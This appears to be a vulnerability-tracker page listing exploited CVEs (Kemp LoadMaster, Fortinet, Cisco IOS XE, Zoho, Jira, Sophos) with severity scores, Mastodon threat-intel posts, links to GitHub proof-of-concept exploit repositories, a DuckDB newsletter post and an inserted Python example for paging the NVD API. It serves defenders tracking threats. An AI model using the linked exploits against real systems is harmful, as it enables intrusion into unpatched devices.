Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

Nuclei template

1 repos

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

- CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:01:21.000Z ##

CVE ID: CVE-2024-1212
Vendor: Progress
Product: Kemp LoadMaster
Date Added: 2024-11-18
Vulnerability: Progress Kemp LoadMaster OS Command Injection Vulnerability
Notes: community.progress.com/s/artic ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

CVE-2024-23113
(9.8 CRITICAL)

EPSS: 1.84%

updated 2024-02-15T15:30:37

5 posts

A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized co

8 repos

https://github.com/expl0itsecurity/CVE-2024-23113

https://github.com/maybelookis/CVE-2024-23113

https://github.com/CheckCve2/CVE-2024-23113

https://github.com/HazeLook/CVE-2024-23113

https://github.com/OxLmahdi/cve-2024-23113

https://github.com/p33d/CVE-2024-23113

https://github.com/puckiestyle/CVE-2024-23113

https://github.com/groshi/CVE-2024-23113-Private-POC

inw@mastodon.social at 2024-11-20T16:57:35.000Z ##

What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec

labs.watchtowr.com/hop-skip-fo

##

jkmcnk@mastodon.social at 2024-11-14T22:59:38.000Z ##

lol, at this point you should just throw your fortinet devices into a landfill. labs.watchtowr.com/hop-skip-fo

##

GossiTheDog@cyberplace.social at 2024-11-14T22:30:31.000Z ##

FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. labs.watchtowr.com/hop-skip-fo

##

AAKL@infosec.exchange at 2024-11-14T16:57:29.000Z ##

WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 labs.watchtowr.com/hop-skip-fo #cybersecurity #infosec #Fortinet

##

screaminggoat@infosec.exchange at 2024-11-14T16:47:12.000Z ##

watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability

watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.

  • This implies that Fortinet have simply patched the wrong code, in the wrong file, in an entirely different library.
  • While we generally try to resist speculation on the internals of vendor’s development teams, it is very alarming that Fortinet appears to have botched this patch so badly (in our opinion). They have (in our opinion), in essence, patched the wrong code, leaving device administrators with a false sense of security.

#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2023-20198
(10.0 CRITICAL)

EPSS: 88.58%

updated 2024-02-03T05:07:29

2 posts

Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For s

Nuclei template

30 repos

https://github.com/W01fh4cker/CVE-2023-20198-RCE

https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198

https://github.com/codeb0ss/CVE-2023-20198-PoC

https://github.com/JoyGhoshs/CVE-2023-20198

https://github.com/raystr-atearedteam/CVE-2023-20198-checker

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/iveresk/cve-2023-20198

https://github.com/netbell/CVE-2023-20198-Fix

https://github.com/ohlawd/CVE-2023-20198

https://github.com/fox-it/cisco-ios-xe-implant-detection

https://github.com/Tounsi007/CVE-2023-20198

https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-

https://github.com/sanan2004/CVE-2023-20198

https://github.com/reket99/Cisco_CVE-2023-20198

https://github.com/ZephrFish/CVE-2023-20198-Checker

https://github.com/alekos3/CVE_2023_20198_Detector

https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner

https://github.com/Vulnmachines/Cisco_CVE-2023-20198

https://github.com/hackingyseguridad/nmap

https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner

https://github.com/sohaibeb/CVE-2023-20198

https://github.com/smokeintheshell/CVE-2023-20198

https://github.com/securityphoenix/cisco-CVE-2023-20198-tester

https://github.com/alekos3/CVE_2023_20198_Remediator

https://github.com/IceBreakerCode/CVE-2023-20198

https://github.com/kacem-expereo/CVE-2023-20198

https://github.com/RevoltSecurities/CVE-2023-20198

https://github.com/Codeb3af/CVE-2023-20198-RCE

https://github.com/Atea-Redteam/CVE-2023-20198

https://github.com/Pushkarup/CVE-2023-20198

screaminggoat@infosec.exchange at 2024-11-18T14:12:26.000Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec

##

CVE-2023-20273
(7.2 HIGH)

EPSS: 7.47%

updated 2024-02-03T05:06:23

2 posts

A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating sys

3 repos

https://github.com/smokeintheshell/CVE-2023-20273

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/fox-it/cisco-ios-xe-implant-detection

screaminggoat@infosec.exchange at 2024-11-18T14:12:26.000Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec

##

CVE-2020-3259
(7.5 HIGH)

EPSS: 2.71%

updated 2023-08-16T18:30:19

1 posts

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs

CVE-2021-40539
(9.8 CRITICAL)

EPSS: 97.47%

updated 2023-08-08T15:31:21

2 posts

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

Nuclei template

5 repos

https://github.com/lpyydxs/CVE-2021-40539

https://github.com/lpyzds/CVE-2021-40539

https://github.com/Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539

https://github.com/DarkSprings/CVE-2021-40539

https://github.com/synacktiv/CVE-2021-40539

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

screaminggoat@infosec.exchange at 2024-11-07T18:12:59.000Z ##

CVE-2021-4043 (5.5 medium) Motion Spell GPAC Null Pointer Dereference Vulnerability is no longer on the KEV Catalog.

#cisa #kev #vulnerability #cisakev

##

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:00:52.000Z ##

CVE ID: CVE-2019-16278
Vendor: Nostromo
Product: nhttpd
Date Added: 2024-11-07
Vulnerability: Nostromo nhttpd Directory Traversal Vulnerability
Notes: nazgul.ch/dev/nostromo_cl.txt ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2022-42475
(9.8 CRITICAL)

EPSS: 27.42%

updated 2023-02-02T05:01:14

2 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

7 repos

https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC

https://github.com/0xhaggis/CVE-2022-42475

https://github.com/Amir-hy/cve-2022-42475

https://github.com/scrt/cve-2022-42475

https://github.com/natceil/cve-2022-42475

https://github.com/Mustafa1986/cve-2022-42475-Fortinet

https://github.com/bryanster/ioc-cve-2022-42475

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2021-27860
(8.8 HIGH)

EPSS: 28.52%

updated 2023-02-01T05:06:42

2 posts

A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p92 and 10.2.2r44p1 could allow a remote, unauthenticated attacker to upload a file to any location on the filesystem. The FatPipe advisory identifier for this vulnerability is FPSA006.

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2021-26086
(5.3 MEDIUM)

EPSS: 97.11%

updated 2023-01-30T05:01:33

2 posts

Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.

2 repos

https://github.com/ColdFusionX/CVE-2021-26086

https://github.com/Jeromeyoung/CVE-2021-26086

cisakevtracker@mastodon.social at 2024-11-12T19:00:54.000Z ##

CVE ID: CVE-2021-26086
Vendor: Atlassian
Product: Jira Server and Data Center
Date Added: 2024-11-12
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Notes: jira.atlassian.com/browse/JRAS ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2019-12900
(9.8 CRITICAL)

EPSS: 1.96%

updated 2023-01-27T05:02:50

1 posts

BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write when there are many selectors.

CVE-2020-12271
(9.8 CRITICAL)

EPSS: 1.67%

updated 2023-01-27T05:02:29

1 posts

A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local

1 repos

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.

TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with data science/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):

INSTALL gsheets FROM community;
LOAD gsheets;

Basic usage patterns include:

-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');

-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);

And, now we can look at the “schema”:

$ duckdb -json -c "
  LOAD gsheets;
  FROM read_gsheet(
    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
    sheet = 'Sheet1'
  )
  LIMIT 1" | jq
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]

And, perform normal ops on it:

$ duckdb -table -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet='Sheet1')
SELECT
  Vendor,
  COUNT(Vendor) AS ct
GROUP BY
  Vendor
ORDER BY
  2 DESC"
+---------------------+----+
|       Vendor        | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               | 9  |
| NETGEAR             | 8  |
| Juniper             | 6  |
| F5                  | 6  |
| PANW                | 5  |
| Sophos              | 5  |
| DrayTek             | 3  |
| Tenda               | 3  |
| TP-Link             | 2  |
| MikroTik            | 2  |
| Dasan               | 2  |
| Check Point         | 1  |
| D-Link and TRENDnet | 1  |
| Barracuda           | 1  |
| Netis               | 1  |
| FatPipe             | 1  |
| Arcadyan            | 1  |
| Sumavision          | 1  |
+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;
LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility: its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (
  WITH
    __req AS (
      SELECT
        http_get(
          'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
        ) AS res
    ),
    __res AS (
      SELECT
        UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves
      FROM
        __req
    )
  FROM __res
);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nested JSON records:

FROM yesterday LIMIT 3;
┌──────────────────────────────────────────────────────────────────────────────┐
│                                     cves                                     │
│                                     json                                     │
├──────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │
└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB lets us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all it’s worth:

FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##
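The Daily Drop post above notes that NVD paginates at 2,000 records and that a single http_get() will not follow the pages. This added example (not the post's code, and not part of the http_client extension) walks the real NVD 2.0 response fields (resultsPerPage, startIndex, totalResults, vulnerabilities) until every page is collected, then reproduces the post's vulnStatus tally; the stub fetcher is a constructed stand-in so the code runs offline, and the placeholder CVE IDs used with it are not real records.

```python
"""Paging the NVD CVE 2.0 API, since a single http_get() stops at 2,000 records."""
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0/"
PAGE_SIZE = 2000  # NVD's maximum resultsPerPage

def http_fetch(params: Dict[str, str]) -> dict:
    """Live fetcher: GET one page from the NVD API with the given query parameters."""
    with urllib.request.urlopen(NVD_URL + "?" + urllib.parse.urlencode(params), timeout=60) as resp:
        return json.loads(resp.read())

def fetch_all_cves(day: str, fetch: Callable[[dict], dict] = http_fetch) -> List[dict]:
    """Collect every CVE published on `day` (YYYY-MM-DD), advancing startIndex
    by the returned resultsPerPage until totalResults is reached."""
    params = {
        "pubStartDate": f"{day}T00:00:00.000",
        "pubEndDate": f"{day}T23:59:59.000",
        "resultsPerPage": str(PAGE_SIZE),
        "startIndex": "0",
    }
    cves: List[dict] = []
    while True:
        page = fetch(params)
        cves.extend(page["vulnerabilities"])
        next_index = page["startIndex"] + page["resultsPerPage"]
        # Stop at the end, or on an empty page, so a malformed response cannot loop forever.
        if next_index >= page["totalResults"] or not page["vulnerabilities"]:
            return cves
        params["startIndex"] = str(next_index)

def vuln_status_counts(cves: List[dict]) -> Dict[str, int]:
    """The post's GROUP BY vulnStatus tally, computed over the paged result."""
    counts: Dict[str, int] = {}
    for rec in cves:
        status = rec["cve"].get("vulnStatus", "Unknown")
        counts[status] = counts.get(status, 0) + 1
    return counts

def make_stub_fetch(records: List[dict], per_page: int) -> Callable[[dict], dict]:
    """Constructed offline stand-in for the NVD API that paginates like the real one."""
    def fetch(params: dict) -> dict:
        start = int(params["startIndex"])
        chunk = records[start:start + per_page]
        return {"resultsPerPage": len(chunk), "startIndex": start,
                "totalResults": len(records), "vulnerabilities": chunk}
    return fetch
```

Point the collected list at DuckDB (for example by writing it to a JSON file and reading it with read_json) to pick up exactly where the post's yesterday table leaves off.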

CVE-2024-11394
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos


thezdi at 2024-11-19T16:52:13.797Z ##

[ZDI-24-1515|CVE-2024-11394] (0Day) Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##


CVE-2024-11393
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos


thezdi at 2024-11-19T16:51:45.963Z ##

